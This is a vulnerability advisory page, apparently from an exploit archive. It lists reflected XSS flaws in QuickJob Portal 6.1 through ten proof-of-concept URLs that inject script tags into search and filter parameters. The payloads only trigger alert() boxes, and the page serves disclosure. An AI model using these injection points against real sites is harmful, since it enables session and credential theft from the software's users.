Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
Change Mirror[11] Download[12]
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://quickjob.bylancer.com/ │
│ Vendor : Bylancer │
│ Software : QuickJob Portal 6.1 │
│ Vuln Type: Reflected XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /listing
GET parameter 'keywords' is vulnerable to RXSS
https://website/listing?keywords=tep81%3C%2ftitle%3E%3Cscript%3Ealert(1)%3C%2fscript%3Exjo44
Path: /listing
GET parameter 'location' is vulnerable to RXSS
https://website/listing?location=dlg48%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3eqlwm9
Path: /listing
GET parameter 'filter' is vulnerable to RXSS
https://website/listing?filter=mi7td%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eqggg0
Path: /listing
GET parameter 'sort' is vulnerable to RXSS
https://website/listing?sort=Newestvxmqa%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edxybf
Path: /listing
GET parameter 'order' is vulnerable to RXSS
https://website/listing?order=DESCpmkh0%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edsavh
Path: /listing
GET parameter 'custom%5B8%5D' is vulnerable to RXSS
https://website/listing?keywords=&location=&placetype=&placeid=&cat=&subcat=&filter=&sort=Newest&order=DESC&job-type=4&salary-type=5&range1=11&range2=999&custom%5B8%5D=12b3r6d%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebojt4
Path: /job-seekers
GET parameter 'age_range1' is vulnerable to RXSS
https://website/job-seekers?age_range1=11grn6r%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ev1w8f
Path: /job-seekers
GET parameter 'age_range2' is vulnerable to RXSS
https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999pkqe0%22%3e%3cscript%3ealert(1)%3c%2fscript%3evbpy9&range1=22&range2=33&gender=Male
Path: /job-seekers
GET parameter 'range1' is vulnerable to RXSS
https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22aafr9%22%3e%3cscript%3ealert(1)%3c%2fscript%3etdi3d&range2=33&gender=Male
Path: /job-seekers
GET parameter 'range2' is vulnerable to RXSS
https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22&range2=33onppz%22%3e%3cscript%3ealert(1)%3c%2fscript%3ee0x0x&gender=Male
[-] Done
File Tags
- ActiveX[18] (932)
- Advisory[19] (81,431)
- Arbitrary[20] (16,094)
- BBS[21] (2,859)
- Bypass[22] (1,702)
- CGI[23] (1,024)
- Code Execution[24] (7,187)
- Conference[25] (678)
- Cracker[26] (841)
- CSRF[27] (3,324)
- DoS[28] (23,233)
- Encryption[29] (2,363)
- Exploit[30] (51,258)
- File Inclusion[31] (4,196)
- File Upload[32] (957)
- Firewall[33] (821)
- Info Disclosure[34] (2,725)
- Intrusion Detection[35] (886)
- Java[36] (3,004)
- JavaScript[37] (844)
- Kernel[38] (6,587)
- Local[39] (14,395)
- Magazine[40] (586)
- Overflow[41] (12,622)
- Perl[42] (1,423)
- PHP[43] (5,129)
- Proof of Concept[44] (2,336)
- Protocol[45] (3,568)
- Python[46] (1,514)
- Remote[47] (30,545)
- Root[48] (3,568)
- Rootkit[49] (506)
- Ruby[50] (609)
- Scanner[51] (1,633)
- Security Tool[52] (7,857)
- Shell[53] (3,165)
- Shellcode[54] (1,211)
- Sniffer[55] (893)
- Spoof[56] (2,190)
- SQL Injection[57] (16,238)
- TCP[58] (2,395)
- Trojan[59] (687)
- UDP[60] (885)
- Virus[61] (664)
- Vulnerability[62] (31,614)
- Web[63] (9,588)
- Whitepaper[64] (3,745)
- x86[65] (961)
- XSS[66] (17,707)
- Other[67]
File Archives
- June 2023[68]
- May 2023[69]
- April 2023[70]
- March 2023[71]
- February 2023[72]
- January 2023[73]
- December 2022[74]
- November 2022[75]
- October 2022[76]
- September 2022[77]
- August 2022[78]
- July 2022[79]
- Older[80]
Systems
- AIX[81] (428)
- Apple[82] (1,981)
- BSD[83] (373)
- CentOS[84] (57)
- Cisco[85] (1,921)
- Debian[86] (6,767)
- Fedora[87] (1,691)
- FreeBSD[88] (1,244)
- Gentoo[89] (4,321)
- HPUX[90] (879)
- iOS[91] (345)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (67)
- Linux[95] (45,945)
- Mac OS X[96] (685)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (482)
- RedHat[100] (13,417)
- Slackware[101] (941)
- Solaris[102] (1,610)
- SUSE[103] (1,444)
- Ubuntu[104] (8,675)
- UNIX[105] (9,250)
- UnixWare[106] (186)
- Windows[107] (6,558)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]